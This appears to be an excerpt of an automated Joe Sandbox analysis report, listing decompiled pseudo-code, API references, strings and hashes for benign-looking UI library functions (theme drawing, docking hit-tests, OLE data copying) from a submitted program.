0x00d28198
0x00d2819b
0x00d281be
0x00000000
0x00d2819d
0x00d2819d
0x00d2819f
0x00d281b7
0x00000000
0x00d281a1
0x00d281a1
0x00d281a3
0x00d281b0
0x00000000
0x00d281a5
0x00d281a5
0x00d281a7
0x00d281a9
0x00d281c3
0x00d281ca
0x00d281cf
0x00d281cf
0x00d281a7
0x00d281a3
0x00d2819f
0x00d281d4
0x00d281da
0x00d281de
0x00d281df
0x00d281eb
0x00d28205
0x00d28212

APIs

__EH_prolog3.LIBCMT ref: 00D2816A

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

_strlen.LIBCMT ref: 00D281C4

Strings

IDX_OFFICE2007_STYLE, xrefs: 00D2817A
AQUA_, xrefs: 00D281B0
SILVER_, xrefs: 00D281A9
BLUE_, xrefs: 00D281BE
BLACK_, xrefs: 00D281B7, 00D281C3, 00D281CB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$_strlen
String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
API String ID: 3239654323-2717817858
Opcode ID: 68ed1571391464e560efb5cc9666a02d94d2952566da54ffe63ba4f189b9d15a
Instruction ID: 103c8eb81e22f46ebfa6e60f860a4e8135db0b3509212424a9b574b3df3fc6c8
Opcode Fuzzy Hash: 68ed1571391464e560efb5cc9666a02d94d2952566da54ffe63ba4f189b9d15a
Instruction Fuzzy Hash: CA11C872901229ABCB01EBA8DD47BBDB775EFA1328F180119B4556B2C1DE308A45E771

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCBC4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00CBCBC4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t22;

				_t18 =  *0xe87034; // 0x0
				if(_t18 != 0) {
					__imp__DecodePointer(_t18);
					_t22 = _t18;
					L4:
					if(_t22 == 0) {
						L6:
						__imp__DrawThemeText(_a4, _a8, _a12, _a16, _a20, _a24, _a28, 0, _a32);
						return _t18;
					}
					 *0xe17a64(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					return _t22->i();
				}
				_t18 = GetModuleHandleW(L"uxtheme.dll");
				if(_t18 == 0) {
					goto L6;
				}
				_t18 = GetProcAddress(_t18, "DrawThemeTextEx");
				_t22 = _t18;
				__imp__EncodePointer(_t22);
				 *0xe87034 = _t18;
				goto L4;
			}

0x00cbcbc7
0x00cbcbcf
0x00cbcbfd
0x00cbcc03
0x00cbcc05
0x00cbcc07
0x00cbcc30
0x00cbcc4a
0x00000000
0x00cbcc4a
0x00cbcc26
0x00000000
0x00cbcc2c
0x00cbcbd6
0x00cbcbde
0x00000000
0x00000000
0x00cbcbe6
0x00cbcbec
0x00cbcbef
0x00cbcbf5
0x00000000

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 00CBCBD6
GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 00CBCBE6
EncodePointer.KERNEL32(00000000), ref: 00CBCBEF
DecodePointer.KERNEL32(00000000), ref: 00CBCBFD
DrawThemeText.UXTHEME(?,?,?,?,?,?,?,00000000,?), ref: 00CBCC4A

Strings

DrawThemeTextEx, xrefs: 00CBCBE0
uxtheme.dll, xrefs: 00CBCBD1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeDrawEncodeHandleModuleProcTextTheme
String ID: DrawThemeTextEx$uxtheme.dll
API String ID: 1727381832-3035683158
Opcode ID: 28c8447412692671ff6bf90f472b026b25dea51a11071f9ca566f294f1cb2515
Instruction ID: 86e0baa44f32eca24858927201c15a71dd938228576a4f6a78db6f2d7bba1f1f
Opcode Fuzzy Hash: 28c8447412692671ff6bf90f472b026b25dea51a11071f9ca566f294f1cb2515
Instruction Fuzzy Hash: 7011AE3210521AAFCF125FA1ED09DEE3F76BF18B90F058050FE69A5130D736D964AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00CE374D Relevance: 12.3, APIs: 8, Instructions: 291
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CE374D(void* __ebx, intOrPtr* __ecx, void* __edx, signed long long __fp0, signed int _a4, signed int* _a8, char _a16) {
				signed int _v0;
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagRECT _v72;
				signed char _v76;
				signed long long _v80;
				struct tagPOINT _v88;
				signed int _v108;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t138;
				signed int _t141;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				intOrPtr _t163;
				void* _t164;
				signed int _t168;
				signed char _t173;
				intOrPtr _t199;
				intOrPtr _t200;
				signed int _t201;
				long _t205;
				intOrPtr _t206;
				signed int* _t209;
				void* _t210;
				void* _t211;
				signed int _t222;
				long _t227;
				intOrPtr _t228;
				void* _t234;
				intOrPtr* _t237;
				void* _t239;
				void* _t240;
				signed char _t243;
				void* _t245;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				int _t260;
				signed long long _t263;

				_t234 = __edx;
				_t138 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t138 ^ _t248;
				_push(__ebx);
				_t209 = _a8;
				_t243 = _a4;
				_v76 = _t243;
				_t236 = __ecx;
				if(_t209 == 0) {
					E00CAA4E7(_t209, __ecx, __ecx, _t243, __eflags);
					asm("int3");
					_push(_t248);
					_t249 = _t250;
					_t141 =  *0xe68dd4; // 0x8d2643c2
					_v108 = _t141 ^ _t249;
					_push(__ecx);
					_t237 = __ecx;
					__eflags =  *(__ecx + 0xb8);
					if( *(__ecx + 0xb8) != 0) {
						_v40.bottom.left = 0;
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						GetWindowRect( *(__ecx + 0x20),  &(_v40.bottom));
						__eflags = _a16;
						if(_a16 == 0) {
							E00CBA172( *((intOrPtr*)(_t237 + 0xb8)),  &(_v40.bottom));
						}
						 *0xe17a64();
						_t148 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xb8)))) + 0x164))))();
						_t243 = _t243;
						__eflags = _t148;
						if(_t148 == 0) {
							_t149 = _a4;
							__eflags = _t149 - _v24.left;
						} else {
							_t149 = _v0;
							__eflags = _t149 - _v40.bottom.left;
						}
						_t136 = __eflags < 0;
						__eflags = _t136;
						_t150 = _t149 & 0xffffff00 | _t136;
					} else {
						_t150 = 1;
					}
					__eflags = _v24.bottom ^ _t249;
					_pop(_t239);
					return E00DDCBCE(_t150, _t209, _v24.bottom ^ _t249, _t234, _t239, _t243);
				} else {
					_v88.x = 0;
					_v88.y = 0;
					_v40.left = 0;
					_v40.top = 0;
					_v40.right = 0;
					_v40.bottom.left = 0;
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					_v72.left = 0;
					_v72.top = 0;
					_v72.right = 0;
					_v72.bottom = 0;
					_v56.left = 0;
					_v56.top = 0;
					_v56.right = 0;
					_v56.bottom = 0;
					GetCursorPos( &_v88);
					GetWindowRect( *(_t236 + 0x20),  &_v40);
					E00CE3722(_t209, _t236, _t234,  &_v56);
					_t222 = E00CACA6C(0xe2b238, E00CE16DE(_t236, _v88.x, _v88.y, _t243, 0, 0xe2b238));
					 *_t209 = _t222;
					_t163 =  *((intOrPtr*)(_t236 + 0xb8));
					if(_t163 == 0) {
						__eflags = _t222;
						if(_t222 == 0) {
							goto L29;
						} else {
							 *0xe17a64(_t222);
							_t168 =  *((intOrPtr*)( *((intOrPtr*)( *_t236 + 0x188))))();
							__eflags = _t168;
							if(_t168 == 0) {
								goto L29;
							} else {
								GetWindowRect( *( *_t209 + 0x20),  &_v24);
								_push(_v88.y);
								_t173 = PtInRect( &_v24, _v88.x);
								__eflags = _t173;
								if(_t173 != 0) {
									goto L28;
								} else {
									asm("fild dword [ebp-0x48]");
									_v80 = __fp0;
									_t263 = _v80;
									_v76 = _v76 & _t173;
									_t227 = _v88.x;
									__eflags = _t227 - _v24.left;
									if(_t227 >= _v24.left) {
										__eflags = _t227 - _v24.right;
										if(_t227 <= _v24.right) {
											_t228 = _v88.y;
											__eflags = _t228 - _v24.top;
											if(_t228 >= _v24.top) {
												__eflags = _t228 - _v24.bottom;
												if(_t228 > _v24.bottom) {
													_v76 = _t228 - _v40.top;
													asm("fild dword [ebp-0x48]");
													_v80 = _t263;
													_v76 = _v40.bottom.left - _v40.top;
													asm("fild dword [ebp-0x48]");
													_v80 =  *0xe1fcd8 * st0;
													_t263 = _v80;
													_t173 = _v88.y - _v24.bottom;
													__eflags = _t173;
													goto L25;
												}
											} else {
												_v76 = _v40.bottom.left - _t228;
												asm("fild dword [ebp-0x48]");
												_v80 = _t263;
												_v76 = _v40.bottom.left - _v40.top;
												asm("fild dword [ebp-0x48]");
												_v80 =  *0xe1fcd8 * st0;
												_t263 = _v80;
												_t173 = _v24.top - _v88.y;
												goto L25;
											}
										} else {
											_v76 = _t227 - _v40.left;
											asm("fild dword [ebp-0x48]");
											_v80 = _t263;
											_v76 = _v40.right - _v40.left;
											asm("fild dword [ebp-0x48]");
											_v80 =  *0xe1fcd8 * st0;
											_t263 = _v80;
											_t173 = _v88.x - _v24.right;
											goto L25;
										}
									} else {
										_v76 = _v40.right - _t227;
										asm("fild dword [ebp-0x48]");
										_v80 = _t263;
										_v76 = _v40.right - _v40.left;
										asm("fild dword [ebp-0x48]");
										_v80 =  *0xe1fcd8 * st0;
										_t263 = _v80;
										_t173 = _v24.left - _v88.x;
										L25:
										asm("fdivp st2, st0");
										_v76 = _t173;
										asm("fdivp st1, st0");
										asm("fmulp st1, st0");
									}
									asm("fild dword [ebp-0x48]");
									_v88 = _t263;
									asm("fcomp qword [ebp-0x54]");
									asm("fnstsw ax");
									__eflags = _t173 & 0x00000001;
									goto L27;
								}
							}
						}
					} else {
						GetWindowRect( *(_t163 + 0x20),  &_v24);
						if(IntersectRect( &_v72,  &_v24,  &_v56) == 0) {
							L28:
							_t164 = 1;
						} else {
							_t211 = _t243 + _t243;
							 *0xe17a64();
							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t236 + 0xb8)))) + 0x164))))() == 0) {
								_t199 = _v24.top;
								__eflags = _v56.top - _t199;
								if(_v56.top >= _t199) {
									L10:
									_t200 = _v56.bottom;
									__eflags = _t200 - _v24.bottom;
									if(_t200 <= _v24.bottom) {
										goto L29;
									} else {
										_t201 = _t200 - _v24.bottom;
										__eflags = _t201;
										goto L12;
									}
								} else {
									__eflags = _t199 - _v56.top - _t211;
									if(_t199 - _v56.top > _t211) {
										goto L13;
									} else {
										goto L10;
									}
								}
							} else {
								_t205 = _v24.left;
								if(_v56.left >= _t205 || _t205 - _v56.left <= _t211) {
									_t206 = _v56.right;
									if(_t206 <= _v24.right) {
										goto L29;
									} else {
										_t201 = _t206 - _v24.right;
										L12:
										if(_t201 <= _t211) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									_push(_v88.y);
									_t260 = PtInRect( &_v24, _v88);
									L27:
									if(_t260 != 0) {
										L29:
										_t164 = 0;
										__eflags = 0;
									} else {
										goto L28;
									}
								}
							}
						}
					}
					_pop(_t240);
					_pop(_t245);
					_pop(_t210);
					return E00DDCBCE(_t164, _t210, _v8 ^ _t248, _t234, _t240, _t245);
				}
			}

0x00ce374d
0x00ce3753
0x00ce375a
0x00ce375d
0x00ce375e
0x00ce3762
0x00ce3765
0x00ce3769
0x00ce376d
0x00ce3a12
0x00ce3a17
0x00ce3a18
0x00ce3a19
0x00ce3a1e
0x00ce3a25
0x00ce3a28
0x00ce3a29
0x00ce3a2d
0x00ce3a33
0x00ce3a39
0x00ce3a3c
0x00ce3a3f
0x00ce3a42
0x00ce3a4c
0x00ce3a52
0x00ce3a56
0x00ce3a62
0x00ce3a62
0x00ce3a78
0x00ce3a80
0x00ce3a82
0x00ce3a83
0x00ce3a85
0x00ce3a8f
0x00ce3a92
0x00ce3a87
0x00ce3a87
0x00ce3a8a
0x00ce3a8a
0x00ce3a95
0x00ce3a95
0x00ce3a95
0x00ce3a35
0x00ce3a35
0x00ce3a35
0x00ce3a9b
0x00ce3a9d
0x00ce3aa4
0x00ce3773
0x00ce3775
0x00ce3778
0x00ce377b
0x00ce377e
0x00ce3781
0x00ce3784
0x00ce3787
0x00ce378a
0x00ce378d
0x00ce3790
0x00ce3793
0x00ce3796
0x00ce3799
0x00ce379c
0x00ce379f
0x00ce37a2
0x00ce37a5
0x00ce37a8
0x00ce37af
0x00ce37bc
0x00ce37c8
0x00ce37ef
0x00ce37f1
0x00ce37f3
0x00ce37fb
0x00ce38a6
0x00ce38a8
0x00000000
0x00ce38ae
0x00ce38b9
0x00ce38c1
0x00ce38c3
0x00ce38c5
0x00000000
0x00ce38cb
0x00ce38d4
0x00ce38da
0x00ce38e4
0x00ce38ea
0x00ce38ec
0x00000000
0x00ce38f2
0x00ce38f2
0x00ce38f5
0x00ce38f8
0x00ce38fb
0x00ce38fe
0x00ce3901
0x00ce3904
0x00ce393c
0x00ce393f
0x00ce3972
0x00ce3975
0x00ce3978
0x00ce39ad
0x00ce39b0
0x00ce39b5
0x00ce39b8
0x00ce39bb
0x00ce39cd
0x00ce39d2
0x00ce39d5
0x00ce39d8
0x00ce39de
0x00ce39de
0x00000000
0x00ce39de
0x00ce397a
0x00ce397f
0x00ce3982
0x00ce3985
0x00ce3997
0x00ce399c
0x00ce399f
0x00ce39a2
0x00ce39a8
0x00000000
0x00ce39a8
0x00ce3941
0x00ce3944
0x00ce3947
0x00ce394a
0x00ce395c
0x00ce3961
0x00ce3964
0x00ce3967
0x00ce396d
0x00000000
0x00ce396d
0x00ce3906
0x00ce390b
0x00ce390e
0x00ce3911
0x00ce3923
0x00ce3928
0x00ce392b
0x00ce392e
0x00ce3934
0x00ce39e1
0x00ce39e1
0x00ce39e3
0x00ce39e6
0x00ce39e8
0x00ce39e8
0x00ce39ea
0x00ce39ed
0x00ce39f0
0x00ce39f3
0x00ce39f5
0x00000000
0x00ce39f5
0x00ce38ec
0x00ce38c5
0x00ce3801
0x00ce3808
0x00ce3822
0x00ce39fa
0x00ce39fc
0x00ce3828
0x00ce382e
0x00ce383b
0x00ce3847
0x00ce3869
0x00ce386c
0x00ce386f
0x00ce3878
0x00ce3878
0x00ce387b
0x00ce387e
0x00000000
0x00ce3884
0x00ce3884
0x00ce3884
0x00000000
0x00ce3884
0x00ce3871
0x00ce3874
0x00ce3876
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce3876
0x00ce3849
0x00ce3849
0x00ce384f
0x00ce3858
0x00ce385e
0x00000000
0x00ce3864
0x00ce3864
0x00ce3887
0x00ce3889
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce3889
0x00ce388f
0x00ce388f
0x00ce388f
0x00ce389f
0x00ce39f8
0x00ce39f8
0x00ce39ff
0x00ce39ff
0x00ce39ff
0x00000000
0x00000000
0x00000000
0x00ce39f8
0x00ce384f
0x00ce3847
0x00ce3822
0x00ce3a04
0x00ce3a05
0x00ce3a08
0x00ce3a0f
0x00ce3a0f

APIs

GetCursorPos.USER32(?), ref: 00CE37AF
GetWindowRect.USER32 ref: 00CE37BC

Part of subcall function 00CE3722: GetParent.USER32(?), ref: 00CE3737

GetWindowRect.USER32 ref: 00CE3808
IntersectRect.USER32 ref: 00CE381A
PtInRect.USER32(?,?,?), ref: 00CE3899
GetWindowRect.USER32 ref: 00CE38D4
PtInRect.USER32(?,?,?), ref: 00CE38E4
GetWindowRect.USER32 ref: 00CE3A4C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Window$CursorIntersectParent
String ID:
API String ID: 1143452425-0
Opcode ID: b97f1b8c002dd98031e8c2451985d162472161998cd812fbb3680da9da926987
Instruction ID: 84e675961b69781485c1004a15da195c588c6aaaab831fda32b2ecf9446ccf22
Opcode Fuzzy Hash: b97f1b8c002dd98031e8c2451985d162472161998cd812fbb3680da9da926987
Instruction Fuzzy Hash: D6C1F371E0024ADFCF14DFAADA899EDBBB5FF08300F20416AE455B7254DB30AA55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA074 Relevance: 12.2, APIs: 8, Instructions: 248
filecomCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00CAA074(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16) {
				intOrPtr* _v0;
				int _v4;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				void* _t85;
				void* _t86;
				void* _t91;
				void* _t102;
				void* _t106;
				void* _t107;
				void* _t110;
				void* _t115;
				void* _t116;
				void* _t121;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t128;
				void* _t130;
				intOrPtr _t136;
				void* _t139;
				void* _t142;
				void* _t146;
				void* _t150;
				void* _t151;
				struct HMETAFILE__* _t154;
				void* _t160;
				void _t161;
				void* _t171;
				void* _t176;
				int* _t179;
				void* _t181;
				void* _t183;
				void* _t186;
				void* _t188;
				signed int _t190;
				void _t194;
				void* _t197;
				intOrPtr* _t198;
				int _t205;
				void* _t208;
				void* _t212;

				_push(0x54);
				E00DDD55F(0xe081c8, __ebx, __edi, __esi);
				_t197 = _a12;
				_t201 = 0;
				_t190 = _a8 & 0x0000ffff;
				_t160 = _a16;
				if( *_t197 != 0) {
					L10:
					_t85 =  *_t160 - 1;
					if(_t85 == 0) {
						_t86 = E00CA9FF5(_t161,  *(_t197 + 4),  *(_t160 + 4));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L22;
						} else {
							 *(_t197 + 4) = _t86;
							goto L38;
						}
					} else {
						_t91 = _t85 - 1;
						if(_t91 == 0) {
							_push( *(_t160 + 4));
							E00CA9617(_t160,  &_v96, _t197, _t201, __eflags);
							_push( *(_t197 + 4));
							_v4 = _t201;
							E00CA9617(_t160,  &_v92, _t197, _t201, __eflags);
							asm("sbb ecx, ecx");
							asm("sbb eax, eax");
							_t201 = CopyFileA( ~( *(_t160 + 4)) & _v96,  ~( *(_t197 + 4)) & _v92, _t201);
							E00CA2975(E00CA2975(_t97, _v92 + 0xfffffff0), _v96 + 0xfffffff0);
						} else {
							_t102 = _t91;
							if(_t102 == 0) {
								_t171 =  *(_t160 + 4);
								_t201 =  *( *_t171 + 0x30);
								 *0xe17a64(_t171,  &_v88, 1);
								_t106 =  *( *( *_t171 + 0x30))();
								__eflags = _t106;
								if(_t106 != 0) {
									goto L22;
								} else {
									_t107 =  *(_t197 + 4);
									 *0xe17a64(_t107, 0, 0, 0, 0);
									 *((intOrPtr*)( *_t107 + 0x14))();
									_t110 =  *(_t160 + 4);
									 *0xe17a64(_t110, 0, 0, 0, 0);
									 *((intOrPtr*)( *_t110 + 0x14))();
									_t176 =  *(_t160 + 4);
									_t201 =  *( *_t176 + 0x1c);
									 *0xe17a64(_t176,  *(_t197 + 4), _v80, _v76, 0, 0);
									_t115 =  *( *( *_t176 + 0x1c))();
									__eflags = _t115;
									if(_t115 != 0) {
										goto L22;
									} else {
										_t116 =  *(_t197 + 4);
										_t197 = 0;
										 *0xe17a64(_t116, 0, 0, 0, 0);
										 *((intOrPtr*)( *_t116 + 0x14))();
										_t179 =  *(_t160 + 4);
										_t201 =  *_t179;
										 *0xe17a64(_t179, 0, 0, 0, 0);
										 *((intOrPtr*)( *_t179 + 0x14))();
										goto L38;
									}
								}
							} else {
								_t121 = _t102 - 4;
								if(_t121 == 0) {
									_t181 =  *(_t160 + 4);
									_t201 =  *( *_t181 + 0x1c);
									 *0xe17a64(_t181, 0, 0, 0,  *(_t197 + 4));
									_t124 =  *( *( *_t181 + 0x1c))();
									__eflags = _t124;
									if(_t124 != 0) {
										goto L22;
									} else {
										goto L38;
									}
								} else {
									_t125 = _t121 - 8;
									if(_t125 == 0) {
										L16:
										if( *(_t197 + 4) != _t201) {
											goto L22;
										} else {
											__imp__OleDuplicateData( *(_t160 + 4), _t190, _t201);
											 *(_t197 + 4) = _t125;
											if(_t125 != 0) {
												goto L38;
											} else {
												goto L22;
											}
										}
									} else {
										_t125 = _t125 - 0x30;
										if(_t125 != 0) {
											goto L22;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
					goto L39;
				} else {
					_t161 =  *_t160;
					_t127 = _t161 - 1;
					if(_t127 == 0) {
						L8:
						 *_t197 = _t161;
						goto L9;
					} else {
						_t128 = _t127 - 1;
						if(_t128 == 0) {
							 *_t197 = 2;
							__eflags =  *(_t160 + 4);
							if(__eflags == 0) {
								E00CAA4E7(_t160, _t161, _t197, 0, __eflags);
								asm("int3");
								_t208 = _t212;
								_t130 = _a8;
								__eflags = _t130;
								if(__eflags == 0) {
									E00CAA4E7(_t160, _t161, _t197, 0, __eflags);
									asm("int3");
									_push(_t208);
									_push(0);
									_t205 = _v4;
									_push(_t197);
									_t198 = _v0;
									 *_t205 =  *_t198;
									 *((intOrPtr*)(_t205 + 4)) = E00CAA3C8( *_t198,  *((intOrPtr*)(_t198 + 4)));
									 *((intOrPtr*)(_t205 + 8)) =  *((intOrPtr*)(_t198 + 8));
									 *((intOrPtr*)(_t205 + 0xc)) =  *((intOrPtr*)(_t198 + 0xc));
									_t136 =  *((intOrPtr*)(_t198 + 0x10));
									 *((intOrPtr*)(_t205 + 0x10)) = _t136;
									return _t136;
								} else {
									_t183 = _a4;
									__eflags = _t183;
									if(_t183 == 0) {
										_t194 = _a8;
										__eflags = _t194;
										if(_t194 != 0) {
											 *(_t130 + 4) =  *(_t130 + 4) & 0x00000000;
											_t183 = _t130;
											 *(_t130 + 0xc) =  *(_t130 + 0xc) | 0xffffffff;
											_t69 = _t130 + 0x10;
											 *_t69 =  *(_t130 + 0x10) | 0xffffffff;
											__eflags =  *_t69;
											 *_t130 = _t194;
											 *((intOrPtr*)(_t130 + 8)) = 1;
										}
									}
									return _t183;
								}
							} else {
								_t201 = E00DEB04D( *(_t160 + 4));
								_t20 = _t201 + 1; // 0x1
								_t139 = E00CA9BA0(_t20, _t20, 2);
								 *(_t197 + 4) = _t139;
								__eflags = _t139;
								if(_t139 == 0) {
									goto L22;
								} else {
									E00CA4FAA(_t160, 2 + _t201 * 2, _t197, _t139, 2 + _t201 * 2,  *(_t160 + 4), 2 + _t201 * 2);
									goto L38;
								}
								goto L39;
							}
						} else {
							_t142 = _t128;
							if(_t142 == 0) {
								_t186 =  *(_t160 + 4);
								 *(_t197 + 4) = _t186;
								_t201 =  *( *_t186 + 4);
								 *0xe17a64(_t186);
								 *( *( *_t186 + 4))();
								 *_t197 = 4;
								goto L38;
							} else {
								_t146 = _t142 - 4;
								if(_t146 == 0) {
									_t188 =  *(_t160 + 4);
									 *(_t197 + 4) = _t188;
									_t201 =  *( *_t188 + 4);
									 *0xe17a64(_t188);
									 *( *( *_t188 + 4))();
									 *_t197 = 8;
									goto L38;
								} else {
									_t150 = _t146 - 8;
									if(_t150 == 0) {
										 *_t197 = 0x10;
										L9:
										 *(_t197 + 4) = _t201;
										goto L10;
									} else {
										_t151 = _t150 - 0x10;
										if(_t151 == 0) {
											_t160 = E00CA9FF5(_t161, 0,  *(_t160 + 4));
											__eflags = _t160;
											if(_t160 == 0) {
												goto L22;
											} else {
												_t201 = GlobalLock(_t160);
												_t154 = CopyMetaFileA( *(_t201 + 0xc), 0);
												 *(_t201 + 0xc) = _t154;
												_push(_t160);
												__eflags = _t154;
												if(_t154 != 0) {
													GlobalUnlock();
													 *(_t197 + 4) = _t160;
													 *_t197 = 0x20;
													L38:
													__eflags = 1;
												} else {
													GlobalUnlock();
													GlobalFree(_t160);
													goto L22;
												}
											}
										} else {
											if(_t151 == 0x20) {
												goto L8;
											}
										}
									}
								}
							}
							L39:
							return E00DDD50E(_t160, _t197, _t201);
						}
					}
				}
			}

0x00caa074
0x00caa07b
0x00caa080
0x00caa083
0x00caa085
0x00caa089
0x00caa08e
0x00caa0d1
0x00caa0d3
0x00caa0d6
0x00caa335
0x00caa33a
0x00caa33c
0x00000000
0x00caa342
0x00caa342
0x00000000
0x00caa342
0x00caa0dc
0x00caa0dc
0x00caa0df
0x00caa2dd
0x00caa2e3
0x00caa2e8
0x00caa2ee
0x00caa2f1
0x00caa2ff
0x00caa307
0x00caa316
0x00caa326
0x00caa0e5
0x00caa0e6
0x00caa0e9
0x00caa234
0x00caa23b
0x00caa245
0x00caa24b
0x00caa24d
0x00caa24f
0x00000000
0x00caa255
0x00caa255
0x00caa264
0x00caa26a
0x00caa26d
0x00caa27c
0x00caa282
0x00caa285
0x00caa297
0x00caa29d
0x00caa2a3
0x00caa2a5
0x00caa2a7
0x00000000
0x00caa2ad
0x00caa2ad
0x00caa2b0
0x00caa2bc
0x00caa2c2
0x00caa2c5
0x00caa2cb
0x00caa2d2
0x00caa2d8
0x00000000
0x00caa2d8
0x00caa2a7
0x00caa0ef
0x00caa0ef
0x00caa0f2
0x00caa20c
0x00caa21a
0x00caa21f
0x00caa225
0x00caa227
0x00caa229
0x00000000
0x00caa22f
0x00000000
0x00caa22f
0x00caa0f8
0x00caa0f8
0x00caa0fb
0x00caa102
0x00caa105
0x00000000
0x00caa107
0x00caa10c
0x00caa112
0x00caa117
0x00000000
0x00caa11d
0x00000000
0x00caa11d
0x00caa117
0x00caa0fd
0x00caa0fd
0x00caa100
0x00000000
0x00000000
0x00000000
0x00000000
0x00caa100
0x00caa0fb
0x00caa0f2
0x00caa0e9
0x00caa0df
0x00000000
0x00caa090
0x00caa090
0x00caa094
0x00caa097
0x00caa0cc
0x00caa0cc
0x00000000
0x00caa099
0x00caa099
0x00caa09c
0x00caa1c0
0x00caa1c6
0x00caa1c9
0x00caa350
0x00caa355
0x00caa357
0x00caa359
0x00caa35c
0x00caa35e
0x00caa38e
0x00caa393
0x00caa394
0x00caa397
0x00caa398
0x00caa39b
0x00caa39c
0x00caa3a2
0x00caa3ad
0x00caa3b3
0x00caa3b9
0x00caa3bc
0x00caa3c0
0x00caa3c5
0x00caa360
0x00caa360
0x00caa363
0x00caa365
0x00caa367
0x00caa36b
0x00caa36e
0x00caa370
0x00caa374
0x00caa376
0x00caa37a
0x00caa37a
0x00caa37a
0x00caa37e
0x00caa381
0x00caa381
0x00caa36e
0x00caa38b
0x00caa38b
0x00caa1cf
0x00caa1d7
0x00caa1db
0x00caa1df
0x00caa1e7
0x00caa1ea
0x00caa1ec
0x00000000
0x00caa1f2
0x00caa1ff
0x00000000
0x00caa204
0x00000000
0x00caa1ec
0x00caa0a2
0x00caa0a3
0x00caa0a6
0x00caa19f
0x00caa1a2
0x00caa1a8
0x00caa1ad
0x00caa1b3
0x00caa1b5
0x00000000
0x00caa0ac
0x00caa0ac
0x00caa0af
0x00caa17e
0x00caa181
0x00caa187
0x00caa18c
0x00caa192
0x00caa194
0x00000000
0x00caa0b5
0x00caa0b5
0x00caa0b8
0x00caa173
0x00caa0ce
0x00caa0ce
0x00000000
0x00caa0be
0x00caa0be
0x00caa0c1
0x00caa128
0x00caa12a
0x00caa12c
0x00000000
0x00caa12e
0x00caa135
